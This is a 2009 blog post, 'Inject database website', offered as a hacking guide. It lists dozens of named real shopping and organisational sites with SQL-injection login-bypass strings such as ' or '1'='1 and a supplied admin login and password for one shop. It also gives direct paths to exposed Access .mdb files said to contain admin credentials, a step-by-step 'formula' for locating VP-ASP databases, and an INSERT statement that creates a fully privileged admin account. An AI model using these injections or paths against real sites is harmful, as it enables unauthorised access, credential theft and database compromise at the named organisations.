Monday, September 7, 2009

Inject database website

http://www.dolphinstreetdesigns.net/shopping/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.freewebfront.com/admin/orders.asp
http://www.gpscompany.com/necart/lor/admin/orders.asp
https://secure.digiweb.net.nz/modchipsconz/admin/upload.htm
http://www.bruinstuff.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.myeventshots.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.virtualimpact.net/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.idream.com.sg/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.danitasboutique.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.thecarshopnj.com/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.indiarc.netfirms.com/cgi-bin/album/album.pl?photo=DrPonidi.jpg
http://images.girly-geek.com/cgi-bin/album.pl?photo=/pon.jpg
http://www.hbr11.com/cgi-bin/album.pl?photo=DR`PONIDI/pon.jpg
http://www.comersus.com/message.asp?message=Dr`Ponidi+minta+ccnya+dong
http://myanmarbestbuy.com/store/comersus_message.asp?message=
http://www.eltiante.com/shop/store/comersus_message.asp?message=
http://extremetracking.com/free-1/scripts/reports/display/nph-edit.cgi?tag=tigcgi&server=z
http://cheiron.humanities.mcmaster.ca/~htp/cgi/edit.cgi?22
http://www.worldwidewiki.net/wiki/OneBigWikiAlphabeticalIndexS/edit
http://www.worldwidewiki.net/wiki/OneBigWiki/edit
http://urchin.earth.li/cgi-bin/twic/wiki/view.pl?page=RSS
*****Sample*****

http://www.1616us.com/shop/shopadmin.asp login=ylp34a# pass=prod43@
http://www.prc-cosmetics.com/asp/newver/mbh/com/xinqi/manage/login.asp L:admin P:' or '1' = '1
http://www.sdi.com.tw/manage/login.asp L:sdi P:sdi / L:sdi P:' or '1' = '1
http://www.slimlife.biz/manage/login.asp? L:admin P:' or '1' = '1
http://www.nlio.idv.tw/disaster/manage/login.asp L:admin P:' or '1' = '1
http://www.lobsterclub.co.kr/news/list.asp L:admin P:' or '1' = '1
http://teayang.co.kr/manage/Default.asp L:admin P:' or '1' = '1
http://www.kmistc.com/manage/default.asp L:admin P:' or '1' = '1
http://www.yxsz.yn.cn/manage/login1.asp L:admin P:' or '1' = '1
http://bikmrdc.lm.fju.edu.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.erp-china.com/Information/infomanage/login.asp L:admin P:' or '1' = '1
seongdong.seoul.go.kr/%EC%84%B1%EB%8F%99%EC%A7%80%EC%97%AD%EA%B2%BD%EC%A0%9C/ manage/login.asp L:admin P:' or '1' = '1
chinaqd-tianrun.com/zengrun/manage/login.asp L:admin P:' or '1' = '1
http://demo.bechoice.com/newsii/manage/login.asp L:admin P:' or '1' = '1
http://www.0577china.com/glasses/manage/login.asp L:admin P:' or '1' = '1
http://ba.lm.fju.edu.tw/singing/ib/MANAGE/login.asp L:admin P:' or '1' = '1
http://www.daeholoan.com/manage/login.asp L:admin P:' or '1' = '1
http://www.gesfim.fr/Manage/login.asp L:admin P:' or '1' = '1
http://www.sggs-cn.com/manage/login.asp L:admin P:' or '1' = '1
http://www.ebooth.com.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.dachangyt.com/lijing/manage/login.asp L:admin P:' or '1' = '1
http://www.516700.com/htgirl/manage/login.asp L:admin P:' or '1' = '1
/fpdb/shop.mdb
/shoponline/fpdb/shop.mdb
/database/metacart.mdb
/shopping/database/metacart.mdb
/shop/database/metacart.mdb
/metacart/database/metacart.mdb
/mcartfree/database/metacart.mdb
/ASP/cart/database/metacart.mdb
http://www.premierhawaii.com/Shopping/ivan.mdb
http://www.exclamationscubancigars.com/cgi-bin/shopping350.mdb
http://www.norteamengros.no/shop/shopping400.mdb
http://www.aamx.com/shopping450.mdb
http://www.onlinedancing.com/shop/shopping.mdb
http://www.missouririvertraders.com/shopping/missouri.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.copperfast.com/metacart/metacart.mdb
http://www.ocie.com/metacart/metacart.mdb
http://www.scrappingcorner.com/productcart/pcadmin/eipc.mdb
http://glasspec.com/productcart/pcadmin/eipc.mdb
http://www.nexostherapeuticals.com/productcart/pcadmin/eipc.mdb
http://www.azardisplays.com/productcart/pcadmin/eipc.mdb

-----------------------------------------------------------------

************Sample**************


https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_index.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_rc4Exec.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_menuUtilities.asp
http://www.digitalive.hpg.com.br/database/comersus.mdb
http://members.xoom.virgilio.it/superand/comersus/database/comersus.mdb
http://www.digiser.ritex.com/tienda2/database/COMERSUS.mdb
http://home.bhak-voitsberg.ac.at/students/1538reicher/comersus/database/comersus.mdb
http://www.musiceducationcenter.com/comersus/store/comersus.mdb

----------------------------------------------------------------------------

Look for the database file with the .mdb extension; this file can be opened with a recent version of Microsoft Access, and it contains the admin login and password.
THE FORMULA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> to find out the name of the database file. It can also reveal the file's location.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> this is to find out the position/location of the .mdb file.


example: www.toko.com/shop/toko.mdb
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...
www.target.com/cgi-bin/shopper.cgi?preadd=action&key=...
www.target.com/cgibin/shopper.cgi?preadd=action&key=..
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...

***********Injection (jar)***************


insert into tbluser ("fldusername","fldpassword","fldaccess") values ('ascii','ascii','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--

Inject database website. Posted by: febrian